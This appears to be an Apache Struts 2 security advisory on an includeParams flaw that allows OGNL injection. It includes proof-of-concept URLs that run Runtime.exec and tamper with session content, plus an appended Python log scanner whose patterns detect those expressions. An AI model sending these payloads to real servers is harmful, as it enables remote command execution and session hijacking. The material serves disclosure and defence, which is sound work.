Summary
| | |
|---|---|
| Excerpt | A vulnerability introduced by forcing parameter inclusion in the URL and Anchor Tag allows remote command execution, session access and manipulation and XSS attacks |
| Who should read this | All Struts 2 developers and users |
| Impact of vulnerability | Remote command execution, remote server context manipulation, injection of malicious client side code |
| Maximum security rating | Critical |
| Recommendation | Developers should immediately upgrade to Struts 2.3.14.2 |
| Affected Software | Struts 2.0.0 - Struts 2.3.14.1 |
| Reporter | Eric Kobrin and Douglas Rodrigues (Akamai), Coverity Security Research Laboratory, NSFOCUS Security Team |
| CVE Identifier | |
Problem
Both the s:url and s:a tag provide an includeParams attribute.
...
The issue was originally addressed by Struts 2.3.14.1 and Security Announcement S2-013. However, the solution introduced with 2.3.14.1 did not address all possible attack vectors, such that every version of Struts 2 before 2.3.14.2 is still vulnerable to such attacks.
Proof of concept
Open HelloWorld.jsp in the Struts Blank App and add the following attribute to one of the url/a tags:

```
includeParams="all"
```

such that the line looks something like this:

```xml
<s:url id="url" action="HelloWorld" includeParams="all">
```

- Run the struts2-blank app
- Open the following url, which results in the calc application opening on Windows (try ....exec('open%20.')} to open a Finder window on Mac OS):

```
http://localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Runtime@getRuntime().exec('calc')}
```

- Open the following url to modify session content:

```
http://localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]='true'}
```

- Open the following url to print out the session content; in combination with the previous example this introduces arbitrary code into the resulting HTML output:

```
http://localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]}
```
...
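As a defensive companion to the proof of concept above, here is an added example (not part of the advisory or the Struts project) that scans access-log request URLs for the OGNL expression markers the PoC URLs carry, including the double-URL-encoded form. The sample log lines, regexes and finding names are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Either OGNL delimiter form with a body: "${...}" or "%{...}".
OGNL_EXPR = re.compile(r"[$%]\{[^}]*\}")
# Context objects an expression must name to reach the server side: the
# sandbox flag, the JVM runtime, and the session/request/application maps.
SENSITIVE = ("#_memberaccess", "@java.lang.runtime@", "#session",
             "#request", "#application", "#context")

def classify_url(url):
    """Return sorted findings for one request URL (path + query); [] means clean."""
    findings = set()
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for field in (key, value):
            # parse_qsl decoded once; decode again so a double-encoded
            # "%2524" still surfaces as "$" before matching.
            decoded = unquote(field)
            if OGNL_EXPR.search(decoded):
                findings.add("ognl-expression")
                low = decoded.lower()
                findings.update("touches:" + s for s in SENSITIVE if s in low)
    return sorted(findings)

# Request field of an Apache/Tomcat combined-format access log line.
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def scan_access_log(lines):
    """Yield (url, findings) for every log line whose URL raises a finding."""
    for line in lines:
        m = REQ_RE.search(line)
        if m and (findings := classify_url(m.group(1))):
            yield m.group(1), findings

# Constructed sample log lines (not real traffic): a benign request, one with
# the advisory's session-read expression, and the same expression double-encoded.
SAMPLE_LOG = [
    '10.0.0.5 - - [23/May/2013:10:00:01 +0000] "GET /struts2-blank/example/HelloWorld.action?aaa=1&lang=en HTTP/1.1" 200 512',
    '10.0.0.9 - - [23/May/2013:10:00:02 +0000] "GET /struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]} HTTP/1.1" 200 640',
    '10.0.0.9 - - [23/May/2013:10:00:03 +0000] "GET /struts2-blank/example/HelloWorld.action?aaa=1%2524%257B%2523session%255B%2522hacked%2522%255D%257D HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for url, findings in scan_access_log(SAMPLE_LOG):
        print(url, "->", ", ".join(findings))
```

Both expression-bearing lines are reported with the same findings; the benign request with only ordinary parameters is not.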